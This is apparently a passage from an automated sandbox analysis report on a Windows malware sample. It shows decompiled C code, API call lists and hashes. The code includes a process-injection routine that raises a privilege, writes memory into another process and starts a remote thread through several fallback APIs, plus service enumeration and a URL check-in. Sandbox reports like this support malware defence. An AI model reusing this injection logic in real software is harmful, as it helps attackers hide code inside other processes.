                                                                                              						CloseHandle(_t82);
                                                                                              					}
                                                                                              					_t26 = InternetOpenW(L"Mozilla/4.0 (compatible)", 0, 0, 0, 0); // executed
                                                                                              					_t75 = _t26;
                                                                                              					__eflags = _t75;
                                                                                              					if(_t75 == 0) {
                                                                                              						goto L19;
                                                                                              					} else {
                                                                                              						_t28 = InternetOpenUrlW(_t75, 0x42a65fc, 0, 0, 0x80000000, 0);
                                                                                              						__eflags = _t28;
                                                                                              						if(_t28 != 0) {
                                                                                              							InternetCloseHandle(_t28);
                                                                                              							InternetCloseHandle(_t75);
                                                                                              							goto L19;
                                                                                              						} else {
                                                                                              							InternetCloseHandle(_t75);
                                                                                              							__eflags = _v8 ^ _t86;
                                                                                              							return E04275AFE(_v8 ^ _t86);
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					if(StrStrIW(_t80, L"netsvcs") == 0) {
                                                                                              						_t38 = StrStrIW(_t80, L"WspService");
                                                                                              						__eflags = _t38;
                                                                                              						if(_t38 == 0) {
                                                                                              							__eflags = StrStrIW(_t80, L"AppService");
                                                                                              							if(__eflags == 0) {
                                                                                              								L19:
                                                                                              								__eflags = _v8 ^ _t86;
                                                                                              								return E04275AFE(_v8 ^ _t86);
                                                                                              							} else {
                                                                                              								_v532 = 0;
                                                                                              								_t77 = E04269620(__ebx,  &_v532, StrStrIW, _t80, __eflags);
                                                                                              								__eflags = _t77;
                                                                                              								if(_t77 == 0) {
                                                                                              									goto L19;
                                                                                              								} else {
                                                                                              									_t83 = _v532;
                                                                                              									__eflags = _t83;
                                                                                              									if(_t83 == 0) {
                                                                                              										goto L19;
                                                                                              									} else {
                                                                                              										_t41 = E0426BD60(__ebx, _t77, _t83, _t77, _t83);
                                                                                              										__eflags = _t41;
                                                                                              										if(_t41 > 0) {
                                                                                              											goto L19;
                                                                                              										} else {
                                                                                              											_push(__ebx);
                                                                                              											do {
                                                                                              												Sleep(0x3e8);
                                                                                              												_t42 = E0426BD60(Sleep, _t77, _t83, _t77, _t83);
                                                                                              												__eflags = _t42;
                                                                                              											} while (_t42 <= 0);
                                                                                              											__eflags = _v8 ^ _t86;
                                                                                              											return E04275AFE(_v8 ^ _t86);
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t84 = CreateThread(0, 0, E0426B5F0, 0, 0,  &_v532);
                                                                                              							WaitForSingleObject(_t84, 0xffffffff);
                                                                                              							CloseHandle(_t84);
                                                                                              							__eflags = _v8 ^ _t86;
                                                                                              							return E04275AFE(_v8 ^ _t86);
                                                                                              						}
                                                                                              					} else {
                                                                                              						CloseHandle(CreateThread(0, 0, E0426AB30, 0, 0, 0));
                                                                                              						CloseHandle(CreateThread(0, 0, E04269E60, 0, 0,  &_v532));
                                                                                              						return E04275AFE(_v8 ^ _t86);
                                                                                              					}
                                                                                              				}
                                                                                              			}





















                                                                                              0x0426c469
                                                                                              0x0426c470
                                                                                              0x0426c47b
                                                                                              0x0426c48b
                                                                                              0x0426c4ab
                                                                                              0x0426c4b3
                                                                                              0x0426c5d6
                                                                                              0x0426c5db
                                                                                              0x0426c5dd
                                                                                              0x0426c60f
                                                                                              0x0426c5df
                                                                                              0x0426c5f9
                                                                                              0x0426c5fe
                                                                                              0x0426c605
                                                                                              0x0426c605
                                                                                              0x0426c621
                                                                                              0x0426c627
                                                                                              0x0426c629
                                                                                              0x0426c62b
                                                                                              0x00000000
                                                                                              0x0426c62d
                                                                                              0x0426c63e
                                                                                              0x0426c644
                                                                                              0x0426c646
                                                                                              0x0426c666
                                                                                              0x0426c669
                                                                                              0x00000000
                                                                                              0x0426c648
                                                                                              0x0426c649
                                                                                              0x0426c654
                                                                                              0x0426c65e
                                                                                              0x0426c65e
                                                                                              0x0426c646
                                                                                              0x0426c4b9
                                                                                              0x0426c4c9
                                                                                              0x0426c51a
                                                                                              0x0426c51c
                                                                                              0x0426c51e
                                                                                              0x0426c564
                                                                                              0x0426c566
                                                                                              0x0426c66b
                                                                                              0x0426c66f
                                                                                              0x0426c67a
                                                                                              0x0426c56c
                                                                                              0x0426c572
                                                                                              0x0426c581
                                                                                              0x0426c583
                                                                                              0x0426c585
                                                                                              0x00000000
                                                                                              0x0426c58b
                                                                                              0x0426c58b
                                                                                              0x0426c591
                                                                                              0x0426c593
                                                                                              0x00000000
                                                                                              0x0426c599
                                                                                              0x0426c59d
                                                                                              0x0426c5a2
                                                                                              0x0426c5a4
                                                                                              0x00000000
                                                                                              0x0426c5aa
                                                                                              0x0426c5aa
                                                                                              0x0426c5b1
                                                                                              0x0426c5b6
                                                                                              0x0426c5bc
                                                                                              0x0426c5c1
                                                                                              0x0426c5c1
                                                                                              0x0426c5cb
                                                                                              0x0426c5d5
                                                                                              0x0426c5d5
                                                                                              0x0426c5a4
                                                                                              0x0426c593
                                                                                              0x0426c585
                                                                                              0x0426c520
                                                                                              0x0426c53a
                                                                                              0x0426c53f
                                                                                              0x0426c546
                                                                                              0x0426c551
                                                                                              0x0426c55b
                                                                                              0x0426c55b
                                                                                              0x0426c4cb
                                                                                              0x0426c4e9
                                                                                              0x0426c502
                                                                                              0x0426c513
                                                                                              0x0426c513
                                                                                              0x0426c4c9

                                                                                              APIs
                                                                                              • GetCommandLineW.KERNEL32(00000001,00000000), ref: 0426C475
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0426C48B
                                                                                              • lstrcmpiW.KERNEL32(-00000002,svchost.exe), ref: 0426C4AB
                                                                                              • StrStrIW.SHLWAPI(00000000,netsvcs), ref: 0426C4C5
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0426AB30,00000000,00000000,00000000), ref: 0426C4E0
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0426C4E9
                                                                                              • CreateThread.KERNEL32(00000000,00000000,04269E60,00000000,00000000,?), ref: 0426C4FF
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0426C502
                                                                                              • StrStrIW.SHLWAPI(00000000,WspService), ref: 0426C51A
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0426B5F0,00000000,00000000,?), ref: 0426C534
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0426C53F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0426C546
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0426B5F0,00000000,00000000,?), ref: 0426C5F3
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0426C5FE
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0426C605
                                                                                              • InternetOpenW.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 0426C621
                                                                                              • InternetOpenUrlW.WININET(00000000,042A65FC,00000000,00000000,80000000,00000000), ref: 0426C63E
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0426C649
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CreateThread$Internet$ObjectOpenSingleWait$CommandFileLineModuleNamelstrcmpi
                                                                                              • String ID: AppService$Mozilla/4.0 (compatible)$WspService$netsvcs$svchost.exe
                                                                                              • API String ID: 2591637205-2775505531
                                                                                              • Opcode ID: 6bed72f75bcdc9c217411a99d00f09d0d80cb910844a39854c030ad7453a85ee
                                                                                              • Instruction ID: 11d981d04bd47d7d47bf4c660bd01e566286fbd34315f2f1500196d6410246a3
                                                                                              • Opcode Fuzzy Hash: 6bed72f75bcdc9c217411a99d00f09d0d80cb910844a39854c030ad7453a85ee
                                                                                              • Instruction Fuzzy Hash: 11513A317902187BEB20BB796C49FBE7368DF84B15F210156FA06E71C0DFA4BD428A59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 66 4269000-4269043 LoadLibraryA GetProcAddress 67 426922f-4269236 call 426ad30 66->67 68 4269049-4269058 RtlAdjustPrivilege 66->68 69 426905e-4269070 OpenProcess 67->69 70 426923c-426924f call 4275afe 67->70 68->69 68->70 69->70 72 4269076-426907d call 4265960 69->72 78 4269083-42690a0 LoadLibraryA GetProcAddress 72->78 79 4269250-4269269 VirtualAllocEx 72->79 80 42690a2-42690a7 78->80 81 42690aa-42690af 78->81 82 4269370-426938c CloseHandle call 4275afe 79->82 83 426926f-4269283 WriteProcessMemory 79->83 80->81 81->79 85 42690b5-42690d0 call 4268c60 81->85 86 4269362-426936a VirtualFreeEx 83->86 87 4269289-426928d 83->87 85->82 93 42690d6-42690ee call 4268ec0 85->93 86->82 87->86 90 4269293-426929a call 4265c40 87->90 95 42692b7-42692d0 LoadLibraryA GetProcAddress 90->95 96 426929c-42692ad CreateRemoteThread 90->96 105 42690f4-42690f8 93->105 106 4269218-426922a call 4268d90 93->106 100 42692d2-42692f7 95->100 101 42692f9-426931a LoadLibraryA GetProcAddress 95->101 98 4269345-4269356 WaitForSingleObject 96->98 99 42692b3 96->99 110 426935e 98->110 99->95 100->98 100->101 103 426931c-4269338 101->103 104 426933b-4269343 101->104 103->104 104->98 104->110 105->106 107 42690fe-4269126 call 4268390 call 4268b90 105->107 106->82 117 426917a-42691a2 call 4268390 call 4268b90 107->117 118 4269128-4269174 call 42681b0 107->118 110->86 117->106 126 42691a4-42691fa call 42681b0 117->126 118->117 123 42691fc-4269210 WaitForSingleObject FindCloseChangeNotification 118->123 123->106 126->106 126->123
                                                                                              C-Code - Quality: 50%
                                                                                              			E04269000(void* __ebx, long __ecx, void* __edx, void* __edi, void* __esi, long _a4) {
                                                                                              				signed int _v8;
                                                                                              				char _v28;
                                                                                              				char _v32;
                                                                                              				long _v36;
                                                                                              				void* _v40;
                                                                                              				signed int _v44;
                                                                                              				void* _v48;
                                                                                              				void* _v52;
                                                                                              				void* _v92;
                                                                                              				signed int _t52;
                                                                                              				void* _t60;
                                                                                              				struct _SECURITY_ATTRIBUTES* _t68;
                                                                                              				_Unknown_base(*)()* _t70;
                                                                                              				_Unknown_base(*)()* _t72;
                                                                                              				void* _t73;
                                                                                              				_Unknown_base(*)()* _t81;
                                                                                              				signed int _t83;
                                                                                              				void* _t84;
                                                                                              				signed int _t87;
                                                                                              				signed int _t89;
                                                                                              				void* _t93;
                                                                                              				long _t102;
                                                                                              				long _t104;
                                                                                              				signed int _t118;
                                                                                              				signed int _t127;
                                                                                              				signed int _t128;
                                                                                              				void* _t133;
                                                                                              				void* _t135;
                                                                                              				signed int _t136;
                                                                                              				long _t138;
                                                                                              				void* _t139;
                                                                                              				signed int _t142;
                                                                                              				signed int _t144;
                                                                                              				void* _t146;
                                                                                              				void* _t147;
                                                                                              
                                                                                              				_t144 = (_t142 & 0xfffffff8) - 0x34;
                                                                                              				_t52 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t52 ^ _t144;
                                                                                              				_push(__ebx);
                                                                                              				_t104 = _a4;
                                                                                              				_push(__esi);
                                                                                              				_push(__edi);
                                                                                              				_t138 = __ecx;
                                                                                              				_v52 = __edx;
                                                                                              				_v32 = 0;
                                                                                              				if(GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege") == 0) {
                                                                                              					if(E0426AD30(_t138) != 0) {
                                                                                              						goto L2;
                                                                                              					} else {
                                                                                              						goto L17;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t102 = RtlAdjustPrivilege(0x14, 1, 0,  &_v36); // executed
                                                                                              					if(_t102 < 0) {
                                                                                              						L17:
                                                                                              						return E04275AFE(_v8 ^ _t144);
                                                                                              					} else {
                                                                                              						L2:
                                                                                              						_t139 = OpenProcess(0x43a, 0, _t138);
                                                                                              						if(_t139 == 0) {
                                                                                              							goto L17;
                                                                                              						} else {
                                                                                              							_t60 = E04265960(); // executed
                                                                                              							if(_t60 == 0) {
                                                                                              								L18:
                                                                                              								_t133 = VirtualAllocEx(_t139, 0, _t104, 0x3000, 0x40);
                                                                                              								_v44 = _t133;
                                                                                              								if(_t133 != 0) {
                                                                                              									if(WriteProcessMemory(_t139, _t133, _v52, _t104,  &_v36) != 0 && _v36 == _t104) {
                                                                                              										_t68 = E04265C40(_t133);
                                                                                              										if(_t68 != 0) {
                                                                                              											L24:
                                                                                              											_t70 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlCreateUserThread");
                                                                                              											if(_t70 == 0) {
                                                                                              												L26:
                                                                                              												_v48 = 0;
                                                                                              												_t72 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateThreadEx");
                                                                                              												if(_t72 != 0) {
                                                                                              													 *_t72( &_v48, 0x1fffff, 0, _t139, _v44, 0, 0, 0, 0, 0, 0);
                                                                                              												}
                                                                                              												_t73 = _v48;
                                                                                              												_t135 = _t73;
                                                                                              												if(_t73 != 0) {
                                                                                              													goto L29;
                                                                                              												}
                                                                                              											} else {
                                                                                              												_v52 = 0;
                                                                                              												 *_t70(_t139, 0, 0, 0, 0, 0, _t133, 0,  &_v52, 0);
                                                                                              												_t135 = _v92;
                                                                                              												if(_t135 != 0) {
                                                                                              													goto L29;
                                                                                              												} else {
                                                                                              													goto L26;
                                                                                              												}
                                                                                              											}
                                                                                              										} else {
                                                                                              											_t135 = CreateRemoteThread(_t139, _t68, _t68, _t133, _t68, _t68, _t68);
                                                                                              											if(_t135 != 0) {
                                                                                              												L29:
                                                                                              												WaitForSingleObject(_t135, 0xffffffff);
                                                                                              												CloseHandle(_t135);
                                                                                              												_v36 = 1;
                                                                                              											} else {
                                                                                              												_t133 = _v48;
                                                                                              												goto L24;
                                                                                              											}
                                                                                              										}
                                                                                              										_t133 = _v44;
                                                                                              									}
                                                                                              									VirtualFreeEx(_t139, _t133, _t104, 0x4000);
                                                                                              								}
                                                                                              							} else {
                                                                                              								_v48 = 0;
                                                                                              								_t81 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                                                              								if(_t81 != 0) {
                                                                                              									 *_t81(_t139,  &_v48);
                                                                                              								}
                                                                                              								if(_v48 != 0) {
                                                                                              									goto L18;
                                                                                              								} else {
                                                                                              									_t127 = _t104;
                                                                                              									_t136 = E04268C60(_t139, _t127);
                                                                                              									_t144 = _t144 - 0x10 + 0x10;
                                                                                              									_t83 = _t127;
                                                                                              									_v44 = _t83;
                                                                                              									if((_t136 | _t83) != 0) {
                                                                                              										_t128 = _v52;
                                                                                              										_t118 = _t139;
                                                                                              										_t84 = E04268EC0(_t118, _t128, _t136, _t83, _t104,  &_v40);
                                                                                              										_t146 = _t144 + 0x10;
                                                                                              										if(_t84 != 0 && _v40 == _t104) {
                                                                                              											_v48 = 0;
                                                                                              											_t87 = E04268B90(_t104, "RtlCreateUserThread", _t128, _t136, _t139, E04268390(_t118), _t128);
                                                                                              											_v40 = _t87;
                                                                                              											_t147 = _t146 + 8;
                                                                                              											_v52 = _t128;
                                                                                              											_t118 = _t87 | _t128;
                                                                                              											if(_t118 == 0) {
                                                                                              												L12:
                                                                                              												_v40 = 0;
                                                                                              												_t89 = E04268B90(_t104, "NtCreateThreadEx", _t128, _t136, _t139, E04268390(_t118), _t128);
                                                                                              												_v36 = _t89;
                                                                                              												_t146 = _t147 + 8;
                                                                                              												_v52 = _t128;
                                                                                              												_t118 = _t89 | _t128;
                                                                                              												if(_t118 != 0) {
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(_v44);
                                                                                              													_push(_t136);
                                                                                              													asm("cdq");
                                                                                              													_push(_t128);
                                                                                              													_push(_t139);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													asm("cdq");
                                                                                              													E042681B0(_v36, _v52, 0xb,  &_v40, _t128, 0x1fffff);
                                                                                              													_t93 = _v40;
                                                                                              													_t146 = _t146 + 0x64;
                                                                                              													_v52 = _t93;
                                                                                              													if(_t93 != 0) {
                                                                                              														goto L14;
                                                                                              													}
                                                                                              												}
                                                                                              											} else {
                                                                                              												asm("cdq");
                                                                                              												_push(_t128);
                                                                                              												_push( &_v28);
                                                                                              												asm("cdq");
                                                                                              												_push(_t128);
                                                                                              												_push( &_v48);
                                                                                              												_push(0);
                                                                                              												_push(0);
                                                                                              												_push(_v44);
                                                                                              												_push(_t136);
                                                                                              												_push(0);
                                                                                              												_push(0);
                                                                                              												_push(0);
                                                                                              												_push(0);
                                                                                              												_push(0);
                                                                                              												_push(0);
                                                                                              												_push(0);
                                                                                              												_push(0);
                                                                                              												_push(0);
                                                                                              												asm("cdq");
                                                                                              												E042681B0(_v40, _v52, 0xa, _t139, _t128, 0);
                                                                                              												_t93 = _v48;
                                                                                              												_t146 = _t147 + 0x5c;
                                                                                              												_v52 = _t93;
                                                                                              												if(_t93 != 0) {
                                                                                              													L14:
                                                                                              													WaitForSingleObject(_t93, 0xffffffff);
                                                                                              													FindCloseChangeNotification(_v52); // executed
                                                                                              													_v32 = 1;
                                                                                              												} else {
                                                                                              													goto L12;
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              										_push(_t118);
                                                                                              										E04268D90(_t139, _t104, _t136, _v44);
                                                                                              										_t144 = _t146 + 0xc;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							CloseHandle(_t139);
                                                                                              							return E04275AFE(_v8 ^ _t144);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}






































                                                                                              0x04269006
                                                                                              0x04269009
                                                                                              0x04269010
                                                                                              0x04269014
                                                                                              0x04269015
                                                                                              0x04269018
                                                                                              0x04269019
                                                                                              0x04269020
                                                                                              0x04269027
                                                                                              0x0426902b
                                                                                              0x04269043
                                                                                              0x04269236
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269049
                                                                                              0x04269054
                                                                                              0x04269058
                                                                                              0x0426923c
                                                                                              0x0426924f
                                                                                              0x0426905e
                                                                                              0x0426905e
                                                                                              0x0426906c
                                                                                              0x04269070
                                                                                              0x00000000
                                                                                              0x04269076
                                                                                              0x04269076
                                                                                              0x0426907d
                                                                                              0x04269250
                                                                                              0x04269261
                                                                                              0x04269263
                                                                                              0x04269269
                                                                                              0x04269283
                                                                                              0x04269293
                                                                                              0x0426929a
                                                                                              0x042692b7
                                                                                              0x042692c8
                                                                                              0x042692d0
                                                                                              0x042692f9
                                                                                              0x04269303
                                                                                              0x04269312
                                                                                              0x0426931a
                                                                                              0x04269339
                                                                                              0x04269339
                                                                                              0x0426933b
                                                                                              0x0426933f
                                                                                              0x04269343
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042692d2
                                                                                              0x042692d8
                                                                                              0x042692ef
                                                                                              0x042692f1
                                                                                              0x042692f7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042692f7
                                                                                              0x0426929c
                                                                                              0x042692a9
                                                                                              0x042692ad
                                                                                              0x04269345
                                                                                              0x04269348
                                                                                              0x04269354
                                                                                              0x04269356
                                                                                              0x042692b3
                                                                                              0x042692b3
                                                                                              0x00000000
                                                                                              0x042692b3
                                                                                              0x042692ad
                                                                                              0x0426935e
                                                                                              0x0426935e
                                                                                              0x0426936a
                                                                                              0x0426936a
                                                                                              0x04269083
                                                                                              0x0426908d
                                                                                              0x04269098
                                                                                              0x042690a0
                                                                                              0x042690a8
                                                                                              0x042690a8
                                                                                              0x042690af
                                                                                              0x00000000
                                                                                              0x042690b5
                                                                                              0x042690b8
                                                                                              0x042690c1
                                                                                              0x042690c3
                                                                                              0x042690c6
                                                                                              0x042690cc
                                                                                              0x042690d0
                                                                                              0x042690d6
                                                                                              0x042690e2
                                                                                              0x042690e4
                                                                                              0x042690e9
                                                                                              0x042690ee
                                                                                              0x042690fe
                                                                                              0x04269112
                                                                                              0x04269119
                                                                                              0x0426911d
                                                                                              0x04269120
                                                                                              0x04269124
                                                                                              0x04269126
                                                                                              0x0426917a
                                                                                              0x0426917a
                                                                                              0x0426918e
                                                                                              0x04269195
                                                                                              0x04269199
                                                                                              0x0426919c
                                                                                              0x042691a0
                                                                                              0x042691a2
                                                                                              0x042691a4
                                                                                              0x042691a6
                                                                                              0x042691a8
                                                                                              0x042691aa
                                                                                              0x042691ac
                                                                                              0x042691ae
                                                                                              0x042691b0
                                                                                              0x042691b2
                                                                                              0x042691b4
                                                                                              0x042691b6
                                                                                              0x042691b8
                                                                                              0x042691ba
                                                                                              0x042691bc
                                                                                              0x042691c2
                                                                                              0x042691c3
                                                                                              0x042691c4
                                                                                              0x042691c5
                                                                                              0x042691c6
                                                                                              0x042691c8
                                                                                              0x042691ca
                                                                                              0x042691d5
                                                                                              0x042691e5
                                                                                              0x042691ea
                                                                                              0x042691f1
                                                                                              0x042691f4
                                                                                              0x042691fa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042691fa
                                                                                              0x04269128
                                                                                              0x0426912c
                                                                                              0x0426912d
                                                                                              0x0426912e
                                                                                              0x04269133
                                                                                              0x04269134
                                                                                              0x04269135
                                                                                              0x04269136
                                                                                              0x04269138
                                                                                              0x0426913a
                                                                                              0x04269140
                                                                                              0x04269141
                                                                                              0x04269143
                                                                                              0x04269145
                                                                                              0x04269147
                                                                                              0x04269149
                                                                                              0x0426914b
                                                                                              0x0426914d
                                                                                              0x0426914f
                                                                                              0x04269151
                                                                                              0x04269155
                                                                                              0x04269162
                                                                                              0x04269167
                                                                                              0x0426916b
                                                                                              0x0426916e
                                                                                              0x04269174
                                                                                              0x042691fc
                                                                                              0x042691ff
                                                                                              0x0426920e
                                                                                              0x04269210
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269174
                                                                                              0x04269126
                                                                                              0x04269218
                                                                                              0x04269222
                                                                                              0x04269227
                                                                                              0x04269227
                                                                                              0x042690d0
                                                                                              0x042690af
                                                                                              0x04269371
                                                                                              0x0426938c
                                                                                              0x0426938c
                                                                                              0x04269070
                                                                                              0x04269058

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32 ref: 04269033
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 0426903B
                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 04269054
                                                                                              • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 04269066
                                                                                                • Part of subcall function 04265960: LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,0426C36B), ref: 04265970
                                                                                                • Part of subcall function 04265960: GetProcAddress.KERNEL32(00000000), ref: 04265977
                                                                                                • Part of subcall function 04265960: GetNativeSystemInfo.KERNEL32(?), ref: 04265997
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04269095
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04269098
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 042691FF
                                                                                              • FindCloseChangeNotification.KERNEL32(?), ref: 0426920E
                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,0426BFF5,00003000,00000040), ref: 0426925B
                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,0426BFF5,?), ref: 0426927B
                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 042692A3
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll,RtlCreateUserThread), ref: 042692C1
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 042692C8
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll,NtCreateThreadEx), ref: 0426930B
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04269312
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04269348
                                                                                              • VirtualFreeEx.KERNEL32(00000000,00000000,0426BFF5,00004000), ref: 0426936A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04269371
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc$CloseObjectProcessSingleVirtualWait$AdjustAllocChangeCreateFindFreeHandleInfoMemoryNativeNotificationOpenPrivilegeRemoteSystemThreadWrite
                                                                                              • String ID: IsWow64Process$NtCreateThreadEx$RtlAdjustPrivilege$RtlCreateUserThread$kernel32.dll$ntdll.dll
                                                                                              • API String ID: 2461120785-1625205875
                                                                                              • Opcode ID: 41b46f5ed790f817236b18715f931491cd1877cfbba7177af327007ce0ab0228
                                                                                              • Instruction ID: 4e9453c0088426535d7783e5d0b70bcf3b1ae629a63b2598cc281653eb64ced0
                                                                                              • Opcode Fuzzy Hash: 41b46f5ed790f817236b18715f931491cd1877cfbba7177af327007ce0ab0228
                                                                                              • Instruction Fuzzy Hash: C2919FB13583026FE710AF289C49F6BB7E9EBC4B14F10051CB556D6280EF74ED858AA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 61%
                                                                                              			E0426BD60(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char _v408;
                                                                                              				struct _QUERY_SERVICE_CONFIG* _v412;
                                                                                              				char _v416;
                                                                                              				short* _v420;
                                                                                              				char _v424;
                                                                                              				intOrPtr _v428;
                                                                                              				void* _v432;
                                                                                              				short* _v436;
                                                                                              				int _v440;
                                                                                              				intOrPtr _v444;
                                                                                              				intOrPtr _v448;
                                                                                              				signed int _t58;
                                                                                              				void* _t63;
                                                                                              				char _t68;
                                                                                              				void* _t69;
                                                                                              				void* _t71;
                                                                                              				intOrPtr _t72;
                                                                                              				void* _t79;
                                                                                              				void* _t80;
                                                                                              				WCHAR* _t85;
                                                                                              				signed int _t87;
                                                                                              				void* _t101;
                                                                                              				long _t102;
                                                                                              				void* _t103;
                                                                                              				void* _t108;
                                                                                              				intOrPtr _t112;
                                                                                              				intOrPtr _t123;
                                                                                              				void* _t124;
                                                                                              				void* _t126;
                                                                                              				void* _t128;
                                                                                              				intOrPtr* _t132;
                                                                                              				signed int _t134;
                                                                                              				intOrPtr* _t137;
                                                                                              				signed int _t142;
                                                                                              				void* _t143;
                                                                                              				void* _t144;
                                                                                              
                                                                                              				_t124 = __edi;
                                                                                              				_t58 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t58 ^ _t142;
                                                                                              				_v448 = __edx;
                                                                                              				_v436 = 0;
                                                                                              				_v424 = 0;
                                                                                              				_v416 = 0;
                                                                                              				_v420 = 0;
                                                                                              				_v444 = __ecx;
                                                                                              				E0427DEA0(__edi,  &_v408, 0, 0x190);
                                                                                              				_t144 = _t143 + 0xc;
                                                                                              				_t63 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                                                              				_t101 = _t63;
                                                                                              				_v412 = _t101;
                                                                                              				if(_t101 != 0) {
                                                                                              					_t132 = __imp__EnumServicesStatusExW;
                                                                                              					 *_t132(_t101, 0, 0x30, 1, 0, 0,  &_v424,  &_v416,  &_v420, 0, __esi);
                                                                                              					_t68 = _v424;
                                                                                              					if(_t68 != 0) {
                                                                                              						_push(_t124);
                                                                                              						_t102 = _t68 + 0x2c;
                                                                                              						_t69 = LocalAlloc(0x40, _t102); // executed
                                                                                              						_v432 = _t69;
                                                                                              						if(_t69 != 0) {
                                                                                              							_push(0);
                                                                                              							_v420 = 0;
                                                                                              							_push( &_v420);
                                                                                              							_push( &_v416);
                                                                                              							_push( &_v424);
                                                                                              							_push(_t102);
                                                                                              							_t103 = _v412;
                                                                                              							_push(_t69);
                                                                                              							_push(1);
                                                                                              							_push(0x30);
                                                                                              							_push(0);
                                                                                              							_push(_t103);
                                                                                              							if( *_t132() != 0) {
                                                                                              								_t71 = LocalAlloc(0x40, 0x2000); // executed
                                                                                              								_t126 = CloseServiceHandle;
                                                                                              								_t108 = _t71;
                                                                                              								_t72 = 0;
                                                                                              								_v412 = _t108;
                                                                                              								_v440 = 0;
                                                                                              								_v428 = 0;
                                                                                              								if(_v416 > 0) {
                                                                                              									_t137 = _v432 + 0x24;
                                                                                              									asm("o16 nop [eax+eax]");
                                                                                              									do {
                                                                                              										if( *((intOrPtr*)(_t137 - 0x18)) == 4) {
                                                                                              											_t80 = OpenServiceW(_t103,  *(_t137 - 0x24), 1); // executed
                                                                                              											_t128 = _t80;
                                                                                              											if(_t128 == 0) {
                                                                                              												_t126 = CloseServiceHandle;
                                                                                              											} else {
                                                                                              												if(QueryServiceConfigW(_t128, _v412, 0x2000,  &_v440) == 0) {
                                                                                              													L21:
                                                                                              													_t126 = CloseServiceHandle;
                                                                                              													CloseServiceHandle(_t128);
                                                                                              												} else {
